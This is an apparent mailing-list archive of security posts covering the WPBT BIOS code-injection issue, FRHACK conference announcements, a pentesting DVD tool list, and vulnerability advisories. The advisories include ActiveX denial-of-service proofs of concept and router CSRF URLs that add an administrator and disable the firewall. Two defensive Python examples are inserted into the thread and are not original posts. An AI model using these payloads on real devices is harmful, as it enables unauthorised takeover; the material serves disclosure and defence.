Re: Windows Platform Binary Table (WPBT) - BIOS PE backdoor

2015-08-13 Thread Jerome Athias
Some more info

https://www.us-cert.gov/ncas/current-activity/2015/08/12/Lenovo-Service-Engine-LSE-BIOS-Vulnerability


2015-08-12 14:44 GMT+03:00 Kevin Beaumont kevin.beaum...@gmail.com:
 PRECURSOR

 There will be debate about whether this is a vulnerability.  It affects a
 majority of user PCs -- including all Enterprise editions of Windows,
 there is no way to disable it, and allows direct code execution into
 secure boot sequences.  I believe it is worth discussing.

 SCOPE

 Microsoft documented a feature in Windows 8 and above called Windows
 Platform Binary Table.  Up until two days ago, this was a single Word
 document not referenced elsewhere on Google:

  
 http://webcache.googleusercontent.com/search?q=cache:H-SSYRAB0usJ:download.microsoft.com/download/8/A/2/8A2FB72D-9B96-4E2D-A559-4A27CF905A80/windows-platform-binary-table.docx+&cd=1&hl=en&ct=clnk&gl=us

 This feature allows a BIOS to deliver the payload of an executable,
 which is run in memory, silently, each time a system is booted.  The
 executable code is run under Session Manager context (i.e.
 SYSTEM).

 This technique is being used by Lenovo and HP to silently deliver
 software, even after systems are completely wiped.  This issue came to
 light in this forum thread:
 http://arstechnica.com/civis/viewtopic.php?p=29551819#p29551819

 Additionally, the code is injected and executed in Windows after the
 Windows kernel has booted - meaning hard drives are accessible.  In an
 HP document - http://h10032.www1.hp.com/ctg/Manual/c03857419.pdf page
 18 - they state that they use Windows Platform Binary Table to inject
 their code into encrypted systems (e.g. BitLocker).

 MITIGATIONS

 It is not possible to disable this functionality.  If you can gain
 access to the BIOS, you can inject code into the Windows boot sequence
 using the documentation linked above.  The BIOS delivered PE code is
 not countersigned by Microsoft.

 Microsoft say: "If partners intentionally or unintentionally introduce
 malware or unwanted software through the WPBT, Microsoft may remove
 such software through the use of antimalware software.  Software that
 is determined to be malicious may be subject to immediate removal
 without notice."

 However, you are relying on Microsoft being aware of attacks.  Since
 the code is executed in memory and not written to disk prior to
 activation, Windows Defender does not even scan the executed code.
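As an added defender-side example (not part of this thread, and not Microsoft's or any vendor's code): a parser for the WPBT ACPI table layout that the Microsoft document linked above describes, so an inventory job can report whether firmware is handing Windows a binary, how large it is, where it sits in memory and what command line it carries. Everything in `SAMPLE_TABLE` (OEM strings, handoff address, command line) is constructed for the example; on Linux hosts the table, when the firmware provides one, is exposed by the kernel at `/sys/firmware/acpi/tables/WPBT`, which `wpbt_present_linux` reads.

```python
"""Inventory check for the Windows Platform Binary Table (WPBT).

Added example for this thread, not code from the original posts or from
Microsoft. Field layout follows the WPBT document linked above: a standard
36-byte ACPI table header, then the handoff memory size and physical
address, a content layout byte, a content type byte, and a UTF-16 command
line preceded by its byte length. Every value in SAMPLE_TABLE is constructed.
"""
import struct
from dataclasses import dataclass
from pathlib import Path
from typing import Optional

# Standard ACPI description header: signature, length, revision, checksum,
# OEM ID, OEM table ID, OEM revision, creator ID, creator revision.
ACPI_HEADER = struct.Struct("<4sIBB6s8sI4sI")      # 36 bytes
# WPBT body that follows the header.
WPBT_BODY = struct.Struct("<IQBBH")                 # 16 bytes
LAYOUT_SINGLE_PE = 1          # content layout: one flat PE image
TYPE_NATIVE_USERMODE = 1      # content type: native user-mode application
LINUX_TABLE_PATH = "/sys/firmware/acpi/tables/WPBT"


@dataclass
class WpbtInfo:
    oem_id: str
    oem_table_id: str
    handoff_size: int
    handoff_address: int
    content_layout: int
    content_type: int
    command_line: str
    checksum_ok: bool


def parse_wpbt(blob: bytes) -> WpbtInfo:
    """Decode a raw WPBT table; raises ValueError on a malformed one."""
    if len(blob) < ACPI_HEADER.size + WPBT_BODY.size:
        raise ValueError("table shorter than header plus body")
    sig, length, _rev, _chk, oem_id, oem_tid, _orev, _cid, _crev = \
        ACPI_HEADER.unpack_from(blob, 0)
    if sig != b"WPBT":
        raise ValueError(f"unexpected signature {sig!r}")
    if length != len(blob):
        raise ValueError(f"length field {length} != {len(blob)} bytes read")
    size, addr, layout, ctype, cmd_len = WPBT_BODY.unpack_from(blob, ACPI_HEADER.size)
    cmd_start = ACPI_HEADER.size + WPBT_BODY.size
    if cmd_start + cmd_len > len(blob):
        raise ValueError("command line runs past end of table")
    cmd = blob[cmd_start:cmd_start + cmd_len].decode("utf-16-le").rstrip("\x00")
    return WpbtInfo(
        oem_id=oem_id.decode("ascii", "replace").strip(),
        oem_table_id=oem_tid.decode("ascii", "replace").strip(),
        handoff_size=size,
        handoff_address=addr,
        content_layout=layout,
        content_type=ctype,
        command_line=cmd,
        # ACPI tables checksum to zero (mod 256) over their full length.
        checksum_ok=(sum(blob) % 256 == 0),
    )


def build_wpbt(handoff_size: int, handoff_address: int, command_line: str,
               oem_id: bytes = b"EXAMPL", oem_table_id: bytes = b"WPBTTEST") -> bytes:
    """Assemble a well-formed WPBT table (used here only to make test input)."""
    cmd = command_line.encode("utf-16-le") + b"\x00\x00"
    body = WPBT_BODY.pack(handoff_size, handoff_address,
                          LAYOUT_SINGLE_PE, TYPE_NATIVE_USERMODE, len(cmd)) + cmd
    header = ACPI_HEADER.pack(b"WPBT", ACPI_HEADER.size + len(body), 1, 0,
                              oem_id, oem_table_id, 1, b"EXMP", 1)
    table = bytearray(header + body)
    table[9] = (-sum(table)) & 0xFF     # checksum byte sits at header offset 9
    return bytes(table)


def wpbt_present_linux(path: str = LINUX_TABLE_PATH) -> Optional[WpbtInfo]:
    """Return the parsed table if the kernel exposes one, else None."""
    p = Path(path)
    if not p.is_file():
        return None
    return parse_wpbt(p.read_bytes())


# Constructed sample: the address and command line are made-up values.
SAMPLE_TABLE = build_wpbt(0x1000, 0x7FFF0000, "-constructed-arg")

if __name__ == "__main__":
    info = wpbt_present_linux() or parse_wpbt(SAMPLE_TABLE)
    print(f"WPBT from {info.oem_id}/{info.oem_table_id}: "
          f"{info.handoff_size} bytes at {info.handoff_address:#x}, "
          f"cmdline={info.command_line!r}, checksum ok={info.checksum_ok}")
```

The checksum covers the whole table, so a truncated or edited copy is reported rather than silently trusted. On a Windows host the same table is what Session Manager consumes; it writes the image out as wpbbin.exe under %SystemRoot%\System32 before running it, so that file, together with the table itself, is the artefact to look for when the post's "never scanned on disk" concern is what you want to counter.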


FRHACK01 DVDs

2009-11-09 Thread Jerome Athias
Hi list,

FRHACK01, International IT Security Conference, was held in Besancon,
France - http://www.frhack.org
FRHACK was not commercial, but technical.

We decided to sell DVDs of the conference to cover our expenses.
If anyone has a problem with this, with FRHACK or with me = he's
invited to contact me directly and we should be able to speak about it
in an eyes2eyes way, like men. If u just want to flame on your blog,
just go to hell.

Anyway, so here it is, the first 2 DVDs of FRHACK available for FREE:
http://www.frhack.org/frhack01_dvd01.iso
http://www.frhack.org/frhack01_stallman.avi

Enjoy
/JA

RIP mil
I never forget my brothers



Re: FRHACK01 DVDs

2009-11-09 Thread Jerome Athias
New CC number, have to update account information, blablabla...
SORRY

Here it is for now:
https://free-security.org/frhack/frhack01_dvd01.iso
https://free-security.org/frhack/frhack01_stallman.avi

/JA

C0m3 b...@ck s00n mi1 ;p



Re: FRHACK01 Slides are online

2009-10-07 Thread Jerome Athias
Permissions have been fixed, you should be able to access to all the
papers now.
Sorry
/JA

On Tuesday, 06 October 2009 at 10:35 +0200, Jerome Athias wrote:
 Hi there,
 
 FRHACK01 (www.frhack.org) is over and we want to thank everyone for
 participating, and really hope that you appreciated this 1st edition and
 had some fun in Besancon, France. [1]
 
 You can find the slides of the speakers here:
 http://www.frhack.org/slides/FRHACK2009_Advanced-Payloads_BSDaemon.ppt
 http://www.frhack.org/slides/FRHACK2009_Attacking-SS7_Langlois.pdf
 http://www.frhack.org/slides/FRHACK2009_Audit_Gamache.ppt
 http://www.frhack.org/slides/FRHACK2009_Business-Logic-Flaws_Georgiadis.ppt
 http://www.frhack.org/slides/FRHACK2009_HackerSpaces_tmplab.pdf
 http://www.frhack.org/slides/FRHACK2009_Hacking-Intranets_Cerrudo.ppt
 http://www.frhack.org/slides/FRHACK2009_IpMorph_Prigent.pdf
 http://www.frhack.org/slides/FRHACK2009_JA.odp
 http://www.frhack.org/slides/FRHACK2009_Kerouanton.pdf
 http://www.frhack.org/slides/FRHACK2009_Massive-Activities_Kachalin.pdf
 http://www.frhack.org/slides/FRHACK2009_Mchiriac.ppt
 http://www.frhack.org/slides/FRHACK2009_MITM-Keylogging_p3Lo.ppt
 http://www.frhack.org/slides/FRHACK2009_Oechslin.pdf
 http://www.frhack.org/slides/FRHACK2009_Sarraute.pdf
 http://www.frhack.org/slides/FRHACK2009_UC-Security_VIPER.pptx
 http://www.frhack.org/slides/FRHACK2009_WAF_Web-Application-Firewalls_Gioria.pdf
 
 
 PS1: We'll upload missing ones in the near future
 PS2: Video recordings of the conferences should be available in a couple
 of weeks [2]
 PS3: I like to break some hashes with it
 
 [1] Public pictures and videos of FRHACK01:
 http://bruno.kerouanton.net/blog/2009/09/06/frhack-in-live/ 
 http://picasaweb.google.ru/A.Kachalin/FrHack1st# 
 http://attackvector.lescigales.org/2009/09/14/frhack01-2009-resume-nothing-is-secure-but-we-can-try-together/
 http://bughira.wordpress.com/2009/09/24/oatv2-0-in-frhack-01/
 http://info.francetelevisions.fr/video-info/index-fr.php?id-video=cafe_HD_1200_besancon_midipile_070909_070920091222_F3
 http://www.net-security.org/secworld.php?id=8059
 
 [2] You can purchase behind the scene professional videos here:
 http://www.frhack.org/videos/frhack_videos_en.pdf 
 french: 
 http://www.frhack.org/videos/frhack_videos_fr.pdf
 
 Thanks again!
 /JA
 



FRHACK01 Slides are online

2009-10-06 Thread Jerome Athias
Hi there,

FRHACK01 (www.frhack.org) is over and we want to thank everyone for
participating, and really hope that you appreciated this 1st edition and
had some fun in Besancon, France. [1]

You can find the slides of the speakers here:
http://www.frhack.org/slides/FRHACK2009_Advanced-Payloads_BSDaemon.ppt
http://www.frhack.org/slides/FRHACK2009_Attacking-SS7_Langlois.pdf
http://www.frhack.org/slides/FRHACK2009_Audit_Gamache.ppt
http://www.frhack.org/slides/FRHACK2009_Business-Logic-Flaws_Georgiadis.ppt
http://www.frhack.org/slides/FRHACK2009_HackerSpaces_tmplab.pdf
http://www.frhack.org/slides/FRHACK2009_Hacking-Intranets_Cerrudo.ppt
http://www.frhack.org/slides/FRHACK2009_IpMorph_Prigent.pdf
http://www.frhack.org/slides/FRHACK2009_JA.odp
http://www.frhack.org/slides/FRHACK2009_Kerouanton.pdf
http://www.frhack.org/slides/FRHACK2009_Massive-Activities_Kachalin.pdf
http://www.frhack.org/slides/FRHACK2009_Mchiriac.ppt
http://www.frhack.org/slides/FRHACK2009_MITM-Keylogging_p3Lo.ppt
http://www.frhack.org/slides/FRHACK2009_Oechslin.pdf
http://www.frhack.org/slides/FRHACK2009_Sarraute.pdf
http://www.frhack.org/slides/FRHACK2009_UC-Security_VIPER.pptx
http://www.frhack.org/slides/FRHACK2009_WAF_Web-Application-Firewalls_Gioria.pdf


PS1: We'll upload missing ones in the near future
PS2: Video recordings of the conferences should be available in a couple
of weeks [2]
PS3: I like to break some hashes with it

[1] Public pictures and videos of FRHACK01:
http://bruno.kerouanton.net/blog/2009/09/06/frhack-in-live/ 
http://picasaweb.google.ru/A.Kachalin/FrHack1st# 
http://attackvector.lescigales.org/2009/09/14/frhack01-2009-resume-nothing-is-secure-but-we-can-try-together/
http://bughira.wordpress.com/2009/09/24/oatv2-0-in-frhack-01/
http://info.francetelevisions.fr/video-info/index-fr.php?id-video=cafe_HD_1200_besancon_midipile_070909_070920091222_F3
http://www.net-security.org/secworld.php?id=8059

[2] You can purchase behind the scene professional videos here:
http://www.frhack.org/videos/frhack_videos_en.pdf 
french: 
http://www.frhack.org/videos/frhack_videos_fr.pdf

Thanks again!
/JA

-- 
NO CISSP, NO CISM, NO CHS-III, NO ISSAP, NO ISSPCS, NO ITILp, NO CGEIT,
NO MCSE, NO MCT, NO ISO27001, NO OSCP, NO IACRB CPT, NO CEPT, NO GPEN, NO CCNP, 
NO CCDP, NO CCIP, NO CCSP, NO CCVP
NOthing
Sorry! I just have a brain and two hands.



Multiple Vulnerabilities

2009-09-28 Thread Jerome Athias
Author:   Francis Provencher (Protek Research Lab's)


#

Application:  Adobe ShockWave Player (11.5.1.601)

Platforms:    Windows XP Professional French SP2 and SP3

Crash:        IE 6.0.2900.2180

Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
 

#

1) Introduction
2) Technical details and bug
3) The Code

#

===
1) Introduction
===

Over 450 million Internet-enabled desktops have installed Adobe Shockwave 
Player.
These people now have access to some of the best the Web has to offer - 
including dazzling 3D games and entertainment,
interactive product demonstrations, and online learning applications. Shockwave 
Player displays Web content that has been created by Adobe Director.

#


2) Technical details 


Name:   SwDir.dll
Ver.:   11.5.1.601
CLSID:  {233C1507-6A77-46A4-9443-F871F945D258}


(d40.b20): Stack overflow - code c0fd 
eax=00305004 ebx=0003 ecx=00032f80 edx=0040 esi=09ae0024 edi=0042
eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs= efl=00010202



#

===
3) The Code
===

Proof of concept DoS code:


<html>

<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258'
id='ShockW'></object>
<script language='vbscript'>

argCount = 1

arg1 = String(2097152, "A")

ShockW.PlayerVersion = arg1

</script>



#
#

Application:  Novell Groupwise Client 7.0.3.1294

Platforms:    Windows XP Professional French SP2 and SP3

Crash:        IE 6.0.2900.2180

Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
 

#

1) Introduction
2) Technical details and bug
3) The Code

#

===
1) Introduction
===

GroupWise is a messaging and collaborative software platform from Novell that 
supports email, calendaring, personal information management, instant 
messaging, and document management. The platform consists of the client 
software, which is available for Windows, Mac OS X, and Linux, and the server 
software, which is supported on Windows Server, Netware, and Linux. The latest 
generation of the platform is GroupWise 8, which was launched in 2008.

#


2) Technical details 


Name:   gxmim1.dll
Ver.:   7.0.3.1294
CLSID:  {9796BED2-C1CF-11D2-9384-0008C7396667}




#

===
3) The Code
===

Proof of concept DoS code:


<html>
<object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667'
id='GWComposeCtl'></object>

<script language='vbscript'>

argCount = 1

arg1 = "AAA"

GWComposeCtl.SetFontFace arg1

</script>




#
#

Application:  EasyMail Quicksoft 6.0.2.0

Platforms:    Windows XP Professional French SP2

Crash:        IE 6.0.2900.2180

Exploitation: remote Code Execution

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
 

#

1) Introduction
2) Technical details and bug
3) The Code

#

===
1) Introduction
===

Create, send, download, parse, print and store internet email messages in your 
classic windows application.  Designed for Visual Basic, ASP, C++, Delphi, 
ColdFusion, PowerBuilder, Access and other development environments.  COM or 
standard DLL interfaces.  This is the software that processes hundreds of 
millions of email messages on the Internet every day.


Re: FRHACK OS v1 alpha1 released

2009-09-04 Thread Jerome Athias
I just would like to clarify that, unfortunately, I (again) made a mistake.

Please forget the name FRHACK OS forever, and call it, if you want,
Back Track FRHACK Edition.
I apologize for this (too fast, too bad).
All credit for Back Track is (and must be) due to the
remote-exploit.org guys ( http://remote-exploit.org ).
I salute them for their awesome work and apologize again.

So now, shame on me, flame or continue what you're doing.

Cheers
/JA



FRHACK OS v1 alpha1 released

2009-09-03 Thread Jerome Athias
Hi list,

We're looking for betatesters for FRHACK OS.
yes another pentesting live dvd

== Overview ==

FRHACK OS is an updated/modified version of the latest BackTrack 4 iso
available for download ( http://www.remote-exploit.org/backtrack.html )
We have updated and added tons of tools.

== Quick view ==

flex
gcc-4.2
libgtk2.0-dev
libexpect-perl
libqt4-opengl-dev
# Java5 - Java6
sun-java6-jre sun-java6-plugin

spoonwep-wpa-rc3.deb
fakeap-0.3.2
svn airgraph-ng
svn airoscript
wget http://sid.rstack.org/code/wifitap.tgz;
WEPCrack-0.1.0
# Charon
wifi-radar-2.0.s05
gpsdrive
ssidsniff-0.53
zulu-0.1
aphopper-0.3
wispy-tools-2007-svn
airsnort-0.2.7e.tar.gz
mdk3-v5.tar.bz2
wepbuster-1.0_beta_0.6

fierce
jbrofuzz-jar-15
wfuzz-1.4

bluemaho_v090417
bluescan_1.0.6
bluesnarfer
ghettotooth.pl
bt_audit-0.1.1
 
fatback-1.3.tar.gz
pasco_20040505_1
unhide_20080519-2
memdump-1.01
allin1-0.4.tar.gz   
   
tor-0.2.1.19
privoxy-3.0.8-stable-src  

ophcrack-3.3.1
vncrack_src-1.21
TFTP-bruteforce
DNSBruteforce
svn kalgecin

fuzzgrind_090622

origami-1.0.0-beta0
   
MetaScan.rb
complemento-0.7  
 
middler-1.0
...

A new version (coming with bug fixes, including rainbow tables,
wordlists, extras (babes excluded), etc.) will be available for FRHACK
01, so you'll be able to use it for the FRHACK Wargame.
http://www.frhack.org

== Download ==
https://www.securinfos.info/frhack/frhack-os.iso
1.4 Gb
MD5 56c3b8ca9aa470cdf85e9589723b0a0b
SHA1 5bc07858c31e667fa82877fe72d1f61f67b37e3f

Enjoy, and thanks for feedbacks (off-list)
/JA

Greetings fly to Regis Senet (JA-PSI.fr)



FRHACK ITSec Conf DVDs and Live Streams

2009-09-03 Thread Jerome Athias
Hi list,

That's the final countdown for FRHACK 01, IT Security Conference, by
hackers - for hackers, France, September 7th-8th 2009.
http://www.frhack.org

Due to demand, the FRHACK staff decided to provide DVDs and a limited
number of accounts to attend FRHACK via live streams.
So, if you can't travel to FRHACK, please register asap on:
http://www.mediatux.com/purchasefrhack.php

Notes:
- track #1 will be available for sure, track #2 should be but we can't
confirm it today
- some talks will be freely available for download after FRHACK, like
mine and Richard Stallman's.

Happy Hacking!
/JA


Multiple Flaws in Huawei SmartAX MT880 [was: Multiple Flaws in Huawei D100]

2009-08-05 Thread jerome . athias
Description:
Huawei MT880 is a device offered by the Algerian telecom operator FAWRI to
provide ADSL Internet connection, and it is already widely in use.
Overview:
The Huawei MT880 firmware and its default configuration have flaws which allow
LAN users to gain unauthorized full access to the device.

Here are just limited PoCs.
Possible XSRFs:

Adding an administrator user:
http://192.168.1.1/Action?user_id=jeromepriv=1pass1=jeromepass2=jeromeid=70

Disabling firewall/anti-DoS... features:
http://192.168.1.1/Action?blacklisting_status=1bl_list=10attack_status=0dos_status=0id=42max_tcp=25max_icmp=25max_host=70

Adding a MAC address to the whitelist:
http://192.168.1.1/Action?insrcmac66=123456789123inblocksrcmac66=1insrcmac67=inblocksrcmac67=1insrcmac68=inblocksrcmac68=1insrcmac69=inblocksrcmac69=1insrcmac70=inblocksrcmac70=1insrcmac71=inblocksrcmac71=1insrcmac72=inblocksrcmac72=1insrcmac73=inblocksrcmac73=1insrcmac74=inblocksrcmac74=1insrcmac75=inblocksrcmac75=1insrcmac76=inblocksrcmac76=1insrcmac77=inblocksrcmac77=1insrcmac78=inblocksrcmac78=1insrcmac79=inblocksrcmac79=1insrcmac80=inblocksrcmac80=1insrcmac81=inblocksrcmac81=1id=104

Adding an IP address allowed by the firewall:
http://192.168.1.1/Action?ip_1=192ip_2=168ip_3=1ip_4=2mask_1=255mask_2=255mask_3=255mask_4=255gateway_1=192gateway_2=168gateway_3=1gateway_4=1id=7

Other flaws are not covered in this advisory.

Cheers
/JA

Jerome Athias
JA-PSI, French IT Security Company
http://www.ja-psi.fr

Are you ready to FRHACK?
International, Technical IT Security Conferences & Trainings, September 7-11th, 
France
http://www.frhack.org
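The flaws listed above are classic cross-site request forgery: the device's /Action endpoint changes configuration on a bare GET with no check on where the request came from. As an added example (not from the advisory and not Huawei's code), here is the check a device web UI should apply before acting on such a request: accept a state change only as a POST, only from the device's own origin (via the Origin header, or the Referer as a fallback), and only with a token bound to the authenticated session. The requests, the session id and the secret below are constructed for the example; 192.168.1.1 is the device address the advisory uses, and `check_csrf`, `issue_token` and `Request` are this example's own names.

```python
"""CSRF checks a device web UI should apply to state-changing actions.

Added example, not from the advisory or from Huawei. It models the defences
the /Action endpoint described above lacks: a state change is accepted only
as a POST, only from the device's own origin (Origin or Referer header),
and only with a token bound to the authenticated session. The requests and
the secret below are constructed; 192.168.1.1 is the device address used in
the advisory.
"""
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

DEVICE_ORIGINS = {"http://192.168.1.1"}   # the UI's own origin(s)
STATE_CHANGING_PATHS = {"/Action"}         # endpoints that modify configuration


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)
    session_id: str = ""   # taken from an already-validated session cookie


def issue_token(secret: bytes, session_id: str) -> str:
    """Per-session anti-CSRF token; the UI embeds it in every form it serves."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def _request_origin(req: Request) -> Optional[str]:
    """Origin header if present, otherwise scheme+host of the Referer."""
    origin = req.headers.get("Origin")
    if origin:
        return origin
    referer = req.headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def check_csrf(req: Request, secret: bytes) -> Tuple[bool, str]:
    """Return (allowed, reason) for a request to the device UI."""
    if req.path not in STATE_CHANGING_PATHS:
        return True, "read-only endpoint"
    if req.method != "POST":
        # A GET is triggered by any image tag or link on a third-party page.
        return False, "state change requested via GET"
    origin = _request_origin(req)
    if origin is None:
        return False, "no Origin or Referer header"
    if origin not in DEVICE_ORIGINS:
        return False, f"cross-site origin {origin}"
    expected = issue_token(secret, req.session_id)
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed requests: the first mirrors the advisory's add-admin pattern
# (a bare GET), the second is a cross-site POST, the third a legitimate one.
SECRET = b"constructed-device-secret"
SESSION = "session-constructed-1"
SAMPLE_REQUESTS = [
    Request("GET", "/Action", {"Referer": "http://attacker.example/page"},
            {"user_id": "x", "priv": "1", "id": "70"}, SESSION),
    Request("POST", "/Action", {"Origin": "http://attacker.example"},
            {"user_id": "x", "csrf_token": issue_token(SECRET, SESSION)}, SESSION),
    Request("POST", "/Action", {"Origin": "http://192.168.1.1"},
            {"user_id": "x", "csrf_token": issue_token(SECRET, SESSION)}, SESSION),
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        allowed, reason = check_csrf(req, SECRET)
        print(f"{req.method} {req.path}: {'allow' if allowed else 'deny'} ({reason})")
```

Refusing a request that carries neither Origin nor Referer is the strict choice; browsers that strip Referer still send Origin on cross-origin POSTs, and the session-bound token is what holds when neither header can be trusted. Note that a per-session HMAC token is the simplest form; a per-form random token stored server-side works as well.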



FRHACK List of Talks and Speakers released

2009-07-16 Thread Jerome Athias
###
FRHACK: By Hackers, For Hackers! http://www.frhack.org
###

+
+ FRHACK 01
+ September 7-8, 2009, at the Great Kursaal Hall of Besançon, France.
+ http://www.frhack.org
+

 Last chance to register for FRHACK's Trainings & Workshops. Hurry up! 
http://www.frhack.org/frhack-trainings.php

-
+ FRHACK List of Talks and Speakers
+ http://www.frhack.org/schedule.php
-

# Invited speakers #

Free Software in Ethics and in Practice
- Richard Matthew Stallman (RMS)

TBA
- David Hulton (h1kari)

TBA
- Rodrigo Rubira Branco (BSDaemon)

TBA (-1 day talk announcement)
- Cesar Cerrudo

Note: Unfortunately, some previously invited speakers will not be
available for FRHACK 2009.


# Selected speakers #

Social Engineering, Hacking brains
- Bruno Kerouanton (Switzerland)

Reverse engineering and cryptographic errors
- Philippe Oechslin (Switzerland)

All browsers MITM keylogging on remote
- p3lo (France)

GSM/GPRS/UMTS (in)security, Forensic on GSM mobiles phone
- PaTa (Spain)

Lockpicking, How to open/break all (back)doors
- Alexandre Triffault (France)

Wireless Sensor Networking as an Asset and a Liability
- Travis Goodspeed (USA)

HostileWRT - Abusing Embedded Hardware Platforms for Covert Operations
- HostileWRT Team (France)

Mystification de la prise d'empreinte (OS Fingerprinting Defeating)
- Guillaume Prigent (France)

Web Application Firewalls
- Sebastien Gioria (OWASP France)

UC Security (Unified Communications Security)
- Abhijeet Hatekar (Sipera Systems) (India)

SS7
- Philippe Langlois (France)

Building Hackerspaces Everywhere
- Philippe Langlois (France)

Virtual Machines (in)security and rootkits
- Nguyen Anh Quynh (Japan)

Memory forensic and incident response for live virtual machine (VM)
- Nguyen Anh Quynh (Japan)

Internet Marketing vs. Web Security: Guide to Extreme Black Hat Online
Profits!
- Anselmus Ricky (Indonesia)

New Algorithms for Attack Planning
- Carlos Sarraute (CORE Security) (Argentina)

Asterisk Resource Exhaustion DoS: Don’t let the fuzz get you!
- Blake Cornell (USA)

Massive malicious activities (malware spreading, DDoS attacks)
- Alexey Kachalin (Russia)

OpenVAS - Open Vulnerability Scanning
- Vlatko Kosturjak (Croatia)

Automated malware analysis, forensic analysis, anti-virus technology
- Mihai Chiriac (Bitdefender) (Romania)

Flash Remote Hacking
- Jon Rose (USA)

Auditing and securing PHP applications
- Philippe Gamache (Québec, Canada)

...


[ - Introduction - ]

FRHACK is the First International IT Security Conference, by hackers -
for hackers, in France!
FRHACK is not commercial - but - highly technical.

Target Audience: Security Officers, Security Professionals and Product
Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and
Firewall Administrators, Teachers, Academic Researchers and Software
Developers.

The conference will be held in Besançon - EU, east of France, close to
Switzerland, and aims to get together industry, government, academia and
underground hackers to share knowledge and leading-edge ideas about
information security and everything related to it.
FRHACK will feature national and international speakers and attendees
with a wide range of skills.
The atmosphere is favorable to presenting all facets of the computer
security subject and will be a great opportunity to network with
like-minded people and enthusiasts.


[ - The venue - ]

FRHACK 01 (1st edition) will take place at the Great Kursaal Hall of
Besançon with capacity for up to 1400 people.

About Besançon: http://en.wikipedia.org/wiki/Besan%C3%A7on

Please register to our RSS to stay tuned:

http://www.frhack.org/frhack.xml

Linkedin group:
http://www.linkedin.com/groups?gid=1613377

Note: We will try to organize a Hacking from Camping camp :p


[ - Information for sponsors - ]

- If you can provide materials, devices, goodies and money,
please contact us at: frhack-spon...@frhack.org


Thanks and see you soon at FRHACK!

Jerome Athias, Founder, Chairman, Program Coordinator
/JA





FRHACK 2009 Final Call For Papers extended

2009-06-01 Thread Jerome Athias
FRHACK 01, Besançon - France
2009 September 7-8, 9-11
http://www.frhack.org
by hackers, for hackers

## Final Call For Papers ##

The Call For Papers for FRHACK 2009 is extended

The deadline for submissions is the 30th of June.

For more information, please visit http://frhack.org/cfp.php


Registration for Trainings/Workshops and the Conference is open
http://frhack.org/register.php

LinkedIn group: http://www.linkedin.com/groups?gid=1613377

See you soon for FRHACK!

Jerome Athias
Main organizer


Do you like good wine, French bread & food, strikes and the French kiss?
If so, you will love FRHACK!




[CFP] FRHACK 2nd Call For Papers

2009-03-02 Thread Jerome Athias

 - Hardware hacking, embedded systems and other electronic devices

 - Mobile devices exploitation, Symbian, P2K and bluetooth technologies

 - Security aspects in SCADA, industrial environments and obscure
networks

[ - Important dates - ]

Conference and trainings

   20090907-08: FRHACK 1st edition

   20090909-10: FRHACK trainings

Please register to our RSS to stay tuned:
http://www.frhack.org/frhack.xml

Linkedin group:
http://www.linkedin.com/groups?gid=1613377

Deadline and submissions

 - Deadline for proposal submissions: 20090601

 - Deadline for slides submissions: 20090701

 - Notification of acceptance or rejection: 20090714

 * E-mail for proposal submissions: c...@frhack.org *

Make sure to provide along with your submission the following details:

 - Speaker name and/or nickname, address, e-mail, phone number and
general contact information

 - A brief but informative description about your talk

 - Short biography of the presenter, including organization, company
and affiliations

 - Estimated time-length of presentation and language

 - General topic of the speech (eg.: network security, secure
programming, computer forensics, etc.)

 - Any other technical requirements for your lecture

 - Whether you need visa to enter France or not

Speakers will be allocated 50 minutes of presentation time, although, if
needed, we can extend the presentation length if requested in advance.

Preferable file formats for papers and slides are PDF, and also
ODT/PPT for slides.

Speakers are asked to hand in slides used in their lectures.

PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your
presentation involves advertisement of products or services please do
not submit.

[ - Information for speakers - ]

Please note that it's our first edition, and so we are looking for
sponsors to cover conference's expenses.

   Speakers' privileges are:

- FRHACK staff can guarantee and we will provide accommodation for 3 nights:

- One economy class return-ticket for each non-resident speaker

- For each resident speaker we will cover travel expenses

- Free pass to the conference for you and a friend

- Speaker activities during, before, and after the conference

- Speaker After-Party with tons of fun, drinks...

[ - Information for instructors - ]

- 50% of the net profit of the class

- 2 nights of accommodation during the trainings

- Free pass to the conference

- Speaker activities during, before, and after the conference

- Speaker After-Party with tons of fun, drinks...

[ - Information for sponsors - ]

- If you can provide or offer materials, devices, goodies and money,
please contact us at: frhack-spon...@frhack.org

[ - Information for attendees - ]

- Invited speakers: http://frhack.org/conference.html
Joanna Rutkowska, Richard Matthew Stallman, David Hulton, Cesar Cerrudo,
Brett Moore, Sebastian Muñiz and Rodrigo Rubira Branco were invited to
speak at FRHACK

- Registration: http://frhack.org/register.html

- Events: http://frhack.org/events.html


[ - Other information - ]

- For further information please check out our web site
http://www.frhack.org (and nowhere else)
It will be updated with everything regarding the conference.
  
- If you have questions, want to send us additional material, or have
problems, feel free to contact us at: frh...@frhack.org


Thanks and see you soon at FRHACK!

Jerome Athias, Founder, Chairman, Program Coordinator
/JA





Re: [Suspected Spam]Security Assessment of the Internet Protocol the IETF

2009-01-08 Thread Jerome Athias
Hi,

I still have not read all of your paper, but my first word is congratulations!
That's a hard job.

Since a quick search didn't give a result for it, and maybe others could
be interested:
The AVISPA (Automated Validation of Internet Security Protocols and
Applications) project aims at developing a push-button,
industrial-strength technology for the analysis of large-scale Internet
security-sensitive protocols and applications.

This website contains all relevant information about AVISPA for project
members, interested third parties and scientists worldwide.
http://www.avispa-project.org/

My 2 cents for now
/JA

Fernando Gont wrote:
 Folks,

